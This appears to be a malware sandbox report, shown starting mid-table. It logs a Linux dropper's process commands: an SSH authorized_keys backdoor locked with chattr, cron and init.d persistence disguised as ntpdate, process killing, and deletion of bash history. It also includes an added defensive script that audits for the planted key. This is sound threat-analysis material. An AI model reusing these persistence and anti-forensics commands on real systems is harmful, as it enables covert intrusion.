| File opened for modification | /root/.ssh/authorized_keys | /tmp/.update/auth | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/authusers | /tmp/.update/auth | N/A |
Processes
/tmp/.update/auth
[/tmp/.update/auth]
/bin/uname
[uname -n]
/bin/mkdir
[mkdir /root/.ssh]
/bin/chmod
[chmod 0700 /root/.ssh]
/bin/chmod
[chmod 0644 /root/.ssh/authorized_keys]
/usr/bin/chattr
[chattr +ai /root/.ssh /root/.ssh/authorized_keys]
/bin/rm
[rm -rf authusers]
/bin/cat
[cat /etc/passwd]
/bin/grep
[grep -e /bin/sh -e /bin/bash]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/usr/bin/chattr
[chattr -ai /root/.ssh /root/.ssh/authorized_keys]
/bin/sed
[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/bin/mkdir
[mkdir /home/user/.ssh]
/bin/chown
[chown -R user /home/user/.ssh]
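The auth stage above enumerates accounts with a /bin/sh or /bin/bash login shell from /etc/passwd, creates each one's ~/.ssh, deletes any authorized_keys line containing `r78x7ECphuPrGrR4SDqE1w` (so it does not append its key twice), rewrites the file and locks it with `chattr +ai`. The report records only the hash of the resulting authorized_keys, not its contents, so that string is the one grounded indicator of the installed key. The audit below is an added example, not code from the report or the sample; it reuses the dropper's account selection and treats the marker as an indicator, and the passwd file and home tree at the bottom are constructed.

```shell
#!/bin/sh
# Added example (not part of the sandbox report or the sample's own code):
# look for the SSH backdoor left by /tmp/.update/auth in every account the
# dropper itself targets. PASSWD and ROOT arguments allow an offline run on a
# constructed tree; on a live host use /etc/passwd and an empty ROOT.

# String the dropper's `sed -i /.../d` removes from authorized_keys before
# rewriting it. The full key is not in the report, so only this marker is used.
KEY_MARKER='r78x7ECphuPrGrR4SDqE1w'

# shell_users PASSWD: print name:home for accounts whose login shell is
# /bin/sh or /bin/bash. The dropper greps the whole passwd line for those
# strings; an exact match on field 7 is used here to avoid false hits.
shell_users() {
    awk -F: '$7 == "/bin/sh" || $7 == "/bin/bash" { print $1 ":" $6 }' "$1"
}

# audit_authorized_keys PASSWD [ROOT]: one line per authorized_keys file found
# under a targeted account, marked BACKDOOR_KEY if it carries the marker.
audit_authorized_keys() {
    passwd=$1
    root=${2:-}
    shell_users "$passwd" | while IFS=: read -r name home; do
        ak="$root$home/.ssh/authorized_keys"
        [ -f "$ak" ] || continue
        if grep -qF "$KEY_MARKER" "$ak"; then
            printf 'BACKDOOR_KEY %s %s\n' "$name" "$ak"
        else
            printf 'clean %s %s\n' "$name" "$ak"
        fi
    done
    return 0
}

# build_sample_tree DIR: constructed passwd file and home directories. The key
# lines are placeholders wrapped around the marker, not real key material.
build_sample_tree() {
    mkdir -p "$1/root/.ssh" "$1/home/user/.ssh" "$1/home/svc"
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
        'user:x:1000:1000:user:/home/user:/bin/sh' \
        'svc:x:1001:1001:svc:/home/svc:/bin/false' > "$1/passwd"
    printf '%s\n' 'ssh-ed25519 AAAAC3PLACEHOLDERr78x7ECphuPrGrR4SDqE1wPLACEHOLDER attacker' \
        > "$1/root/.ssh/authorized_keys"
    printf '%s\n' 'ssh-ed25519 AAAAC3PLACEHOLDERLEGITIMATEKEY user@laptop' \
        > "$1/home/user/.ssh/authorized_keys"
}

stage=$(mktemp -d)
build_sample_tree "$stage"
audit_authorized_keys "$stage/passwd" "$stage"
rm -rf "$stage"
```

Before editing a flagged file remember that the dropper sets `chattr +ai` on both `~/.ssh` and `authorized_keys`; clear the flags with `chattr -ai` first (the dropper does the same before its own `sed -i`), and check `lsattr` on every targeted home, since the flags are themselves a sign the file was touched by this stage.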
Network
Files
/root/.ssh/authorized_keys
| MD5 | 3fdca3b51b9c7ea16d39ffe168fdb5f9 |
| SHA1 | 129679920ccdd3b0f43bb743c475d0e6bfa65488 |
| SHA256 | c11d21fa2f98c2c0a1c311042d0d3302f289b47320fdaaaff371b100c2e97b22 |
| SHA512 | eee67cda123034a81886571e6aa1dcd7d5eb7eb74af6ed71e336b6cb4fbe151ccc7efdcdbecc50b17dcfd00ef319edc119648fbbfd3643c98afa80c88d425f94 |
/tmp/.update/authusers
| MD5 | 9514cd886e4faf1f23baadfd967abcbd |
| SHA1 | 00894ed21cee494a192e94a782ae265e45d828f1 |
| SHA256 | 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432 |
| SHA512 | 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6 |
/tmp/.update/authusers
| MD5 | fe065880cc6e0333e8679d0e03ff2369 |
| SHA1 | aaceb9f893c93f47ddccca1e2e502c01ecbc5456 |
| SHA256 | f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77 |
| SHA512 | ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240729-en
Max time kernel
2s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/16/stat | /bin/ps | N/A |
| File opened for reading | /proc/18/status | /bin/ps | N/A |
| File opened for reading | /proc/70/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/672/status | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /bin/ps | N/A |
| File opened for reading | /proc/379/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/10/stat | /bin/ps | N/A |
| File opened for reading | /proc/72/stat | /bin/ps | N/A |
| File opened for reading | /proc/172/status | /bin/ps | N/A |
| File opened for reading | /proc/10/status | /bin/ps | N/A |
| File opened for reading | /proc/380/stat | /bin/ps | N/A |
| File opened for reading | /proc/675/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/13/stat | /bin/ps | N/A |
| File opened for reading | /proc/4/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /bin/ps | N/A |
| File opened for reading | /proc/732/stat | /bin/ps | N/A |
| File opened for reading | /proc/737/stat | /bin/ps | N/A |
| File opened for reading | /proc/18/stat | /bin/ps | N/A |
| File opened for reading | /proc/110/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/82/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/157/status | /bin/ps | N/A |
| File opened for reading | /proc/232/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/4/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/728/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/385/stat | /bin/ps | N/A |
| File opened for reading | /proc/726/status | /bin/ps | N/A |
| File opened for reading | /proc/232/stat | /bin/ps | N/A |
| File opened for reading | /proc/334/stat | /bin/ps | N/A |
| File opened for reading | /proc/334/status | /bin/ps | N/A |
| File opened for reading | /proc/3/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /bin/ps | N/A |
| File opened for reading | /proc/337/status | /bin/ps | N/A |
| File opened for reading | /proc/11/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/10/status | /bin/ps | N/A |
| File opened for reading | /proc/1/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/20/status | /bin/ps | N/A |
| File opened for reading | /proc/749/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/10/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/686/status | /bin/ps | N/A |
| File opened for reading | /proc/728/status | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/pid_max | /bin/ps | N/A |
| File opened for reading | /proc/122/status | /bin/ps | N/A |
| File opened for reading | /proc/365/stat | /bin/ps | N/A |
| File opened for reading | /proc/70/stat | /bin/ps | N/A |
| File opened for reading | /proc/73/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/9/status | /bin/ps | N/A |
| File opened for reading | /proc/17/stat | /bin/ps | N/A |
| File opened for reading | /proc/706/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/750/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /bin/ps | N/A |
| File opened for reading | /proc/12/stat | /bin/ps | N/A |
| File opened for reading | /proc/17/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/725/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/73/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/75/stat | /bin/ps | N/A |
| File opened for reading | /proc/675/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/232/stat | /bin/ps | N/A |
| File opened for reading | /proc/247/stat | /bin/ps | N/A |
| File opened for reading | /proc/736/status | /bin/ps | N/A |
| File opened for reading | /proc/22/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/36/status | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /bin/ps | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cp | N/A |
Processes
/tmp/.systemd/.run
[/tmp/.systemd/.run]
/bin/grep
[grep -v R]
/bin/ps
[ps x]
/bin/grep
[grep ssh ]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/ps
[ps x]
/bin/grep
[grep ssh$]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v R]
/bin/grep
[grep sh$]
/bin/ps
[ps x]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/uname
[uname -m]
/bin/cp
[cp -f -- .mips -bash]
/tmp/.systemd/-bash
[./-bash]
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240729-en
Max time kernel
1s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.H4b4Eo | /usr/bin/crontab | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/systemd.d | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/.systemd | /tmp/.systemd/auto | N/A |
Processes
/tmp/.systemd/auto
[/tmp/.systemd/auto]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep .systemd]
/usr/bin/wc
[wc -l]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab systemd.d]
/bin/rm
[rm -rf systemd.d]
/bin/chmod
[chmod u+x .systemd]
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/var/spool/cron/crontabs/tmp.H4b4Eo
| MD5 | 54e3db15261abf8fb2fe18e1bc40ac54 |
| SHA1 | 1817d7f2f29f77d7a12c631828edbdce337e6a84 |
| SHA256 | 74a6d7c05f80bf9fd583ad1e7d7422c6acdb640eb7c2dc0147b4d9f7d1950e0b |
| SHA512 | 4aecb5695a6db5fdb136f8520e4cbea9a4edb9b9968d69b006641a61ab257df78a85de7ac12ca5606abb6de67892b8416ac36db5a06ff5bce1927b4f0cc953ed |
/tmp/.systemd/.systemd
| MD5 | 9ef2b0f44129dbed4b1284c1d748b10b |
| SHA1 | 2bb3bcea6f21a5567090bdacd84ca4b1482d9f68 |
| SHA256 | 5a2aceb88f74b14be6fb451f8d7d0fb29b5eb5c14a1342c51fddbf312e158cf3 |
| SHA512 | e0daccbdd2034b50c8444482efda6d66988b19ac5424ae39452a643993fe3383c8be855a49c83cdaa37bbd1563c7dc0883d2bc96807471558a5bc4209a24738c |
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-mipsel-20240611-en
Max time kernel
1s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.53uIAl | /usr/bin/crontab | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.d | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/.systemd | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/auto | N/A |
Processes
/tmp/.systemd/auto
[/tmp/.systemd/auto]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep .systemd]
/usr/bin/wc
[wc -l]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab systemd.d]
/bin/rm
[rm -rf systemd.d]
/bin/chmod
[chmod u+x .systemd]
Network
Files
/tmp/.systemd/systemd.dir
/var/spool/cron/crontabs/tmp.53uIAl
/tmp/.systemd/.systemd
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-armhf-20240611-en
Max time kernel
2s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.d/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.daily/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.hourly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.monthly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.weekly/ntpdate | /usr/bin/tee | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/ntpdate | /usr/bin/tee | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/entpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/lntpdate | /usr/bin/tee | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/ntpdate | N/A |
Processes
/tmp/.systemd/ntpdate
[/tmp/.systemd/ntpdate]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/bin/mkdir
[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]
/usr/bin/chattr
[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]
/bin/rm
[rm -rf /sbin/bcrond]
/bin/cp
[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bcrond]
/usr/bin/tee
[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]
/bin/chmod
[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr -a -i /sbin/bsysd]
/bin/rm
[rm -rf /sbin/bsysd]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/entpdate /sbin/bsysde]
/bin/rm
[rm -rf /sbin/bsysde]
/bin/cp
[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bsysde]
/usr/bin/tee
[tee -a /sbin/entpdate]
/bin/chmod
[chmod +x /sbin/entpdate]
/usr/bin/chattr
[chattr +i +a /sbin/entpdate /sbin/bsysde]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/lntpdate /sbin/bsysdl]
/bin/rm
[rm -rf /sbin/bsysdl]
/bin/cp
[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bsysdl]
/usr/bin/tee
[tee -a /sbin/lntpdate]
/bin/chmod
[chmod +x /sbin/lntpdate]
/usr/bin/chattr
[chattr +i +a /sbin/lntpdate /sbin/bsysdl]
/usr/bin/which
[which update-rc.d]
/usr/bin/chattr
[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]
/bin/rm
[rm -rf /sbin/binitd]
/bin/cp
[cp -f -r -- /tmp/.systemd/.armv7l /sbin/binitd]
/usr/bin/tee
[tee -a /etc/init.d/ntpdate]
/bin/chmod
[chmod +x /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/chattr
[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/which
[which chkconfig]
Network
Files
/tmp/.systemd/systemd.dir
/etc/cron.d/ntpdate
/sbin/entpdate
/sbin/lntpdate
/etc/init.d/ntpdate
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240729-en
Max time kernel
0s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/update.dir | /tmp/.update/.run | N/A |
| File opened for modification | /tmp/.update/.update | /tmp/.update/.run | N/A |
Processes
/tmp/.update/.run
[/tmp/.update/.run]
/bin/uname
[uname -m]
/bin/cat
[cat update.dir]
/tmp/.update/.mips
[./.mips -f]
Network
Files
/tmp/.update/update.dir
/tmp/.update/.update
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsel-20240729-en
Max time kernel
2s
Command Line
Signatures
Adds new SSH keys
| Description | Indicator | Process | Target |
| File opened for modification | /root/.ssh/authorized_keys | /tmp/.update/auth | N/A |
| File opened for modification | /home/user/.ssh/authorized_keys | /tmp/.update/auth | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/authusers | /tmp/.update/auth | N/A |
Processes
/tmp/.update/auth
[/tmp/.update/auth]
/bin/uname
[uname -n]
/bin/mkdir
[mkdir /root/.ssh]
/bin/chmod
[chmod 0700 /root/.ssh]
/bin/chmod
[chmod 0644 /root/.ssh/authorized_keys]
/usr/bin/chattr
[chattr +ai /root/.ssh /root/.ssh/authorized_keys]
/bin/rm
[rm -rf authusers]
/bin/grep
[grep -e /bin/sh -e /bin/bash]
/bin/cat
[cat /etc/passwd]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/usr/bin/chattr
[chattr -ai /root/.ssh /root/.ssh/authorized_keys]
/bin/sed
[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/bin/mkdir
[mkdir /home/user/.ssh]
/bin/chown
[chown -R user /home/user/.ssh]
Network
Files
/root/.ssh/authorized_keys
/tmp/.update/authusers
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-armhf-20240611-en
Max time kernel
2s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/13/stat | /bin/ps | N/A |
| File opened for reading | /proc/28/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/29/status | /bin/ps | N/A |
| File opened for reading | /proc/281/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/295/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/661/stat | /bin/ps | N/A |
| File opened for reading | /proc/683/stat | /bin/ps | N/A |
| File opened for reading | /proc/28/stat | /bin/ps | N/A |
| File opened for reading | /proc/606/status | /bin/ps | N/A |
| File opened for reading | /proc/3/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/342/status | /bin/ps | N/A |
| File opened for reading | /proc/598/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/683/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/14/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/144/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/679/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/26/status | /bin/ps | N/A |
| File opened for reading | /proc/29/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /bin/ps | N/A |
| File opened for reading | /proc/314/stat | /bin/ps | N/A |
| File opened for reading | /proc/328/stat | /bin/ps | N/A |
| File opened for reading | /proc/606/status | /bin/ps | N/A |
| File opened for reading | /proc/691/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /bin/ps | N/A |
| File opened for reading | /proc/155/stat | /bin/ps | N/A |
| File opened for reading | /proc/279/stat | /bin/ps | N/A |
| File opened for reading | /proc/283/stat | /bin/ps | N/A |
| File opened for reading | /proc/694/status | /bin/ps | N/A |
| File opened for reading | /proc/686/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/686/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/706/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/41/stat | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /bin/ps | N/A |
| File opened for reading | /proc/283/stat | /bin/ps | N/A |
| File opened for reading | /proc/81/status | /bin/ps | N/A |
| File opened for reading | /proc/342/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/685/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/self/stat | /bin/ps | N/A |
| File opened for reading | /proc/316/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1/status | /bin/ps | N/A |
| File opened for reading | /proc/281/status | /bin/ps | N/A |
| File opened for reading | /proc/155/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/601/status | /bin/ps | N/A |
| File opened for reading | /proc/113/stat | /bin/ps | N/A |
| File opened for reading | /proc/693/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/43/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/279/status | /bin/ps | N/A |
| File opened for reading | /proc/8/stat | /bin/ps | N/A |
| File opened for reading | /proc/143/stat | /bin/ps | N/A |
| File opened for reading | /proc/103/stat | /bin/ps | N/A |
| File opened for reading | /proc/598/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/229/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/280/stat | /bin/ps | N/A |
| File opened for reading | /proc/598/status | /bin/ps | N/A |
| File opened for reading | /proc/686/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/2/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/29/stat | /bin/ps | N/A |
| File opened for reading | /proc/603/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/655/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/679/status | /bin/ps | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/24/stat | /bin/ps | N/A |
| File opened for reading | /proc/26/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/21/stat | /bin/ps | N/A |
Processes
/tmp/.systemd/.run
[/tmp/.systemd/.run]
/bin/grep
[grep -v R]
/bin/ps
[ps x]
/bin/grep
[grep ssh ]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/ps
[ps x]
/bin/grep
[grep ssh$]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep sh$]
/bin/ps
[ps x]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/uname
[uname -m]
/bin/cp
[cp -f -- .armv7l -bash]
/tmp/.systemd/-bash
[./-bash]
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Processes
/tmp/.systemd/clean
[/tmp/.systemd/clean]
/bin/uname
[uname -m]
/bin/rm
[rm -rf .i686]
/bin/rm
[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]
/bin/rm
[rm -rf /root/.bash_history]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 151.101.1.91:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 195.181.164.15:443 | | tcp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.systemd/go
[/tmp/.systemd/go]
/tmp/.systemd/auto
[./auto]
/tmp/.systemd/ntpdate
[./ntpdate]
/tmp/.systemd/.run
[./.run]
/tmp/.systemd/clean
[./clean]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 89.187.167.38:443 | | tcp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsel-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/go
[/tmp/.systemd/go]
/tmp/.systemd/auto
[./auto]
/tmp/.systemd/ntpdate
[./ntpdate]
/tmp/.systemd/.run
[./.run]
/tmp/.systemd/clean
[./clean]
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
130s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
